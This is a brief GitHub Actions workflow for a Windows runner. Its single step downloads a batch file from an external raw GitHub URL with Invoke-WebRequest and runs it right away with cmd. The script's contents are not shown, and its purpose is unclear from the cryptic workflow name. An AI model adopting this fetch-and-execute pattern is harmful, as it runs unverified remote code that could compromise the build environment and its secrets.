name: Windows - H2S - CM - Direct - server 1 Dual

on:
  workflow_dispatch:

jobs:
  build:
    name: Start Building...
    runs-on: windows-latest
  
    
    steps:
      - name: Downloading & Installing Essentials
        run: |
          Invoke-WebRequest -Uri "https://raw.githubusercontent.com/Bogyi2024/log/main/directcm720kkdu.bat" -OutFile "directcm720kkdu.bat"
          cmd /c directcm720kkdu.bat
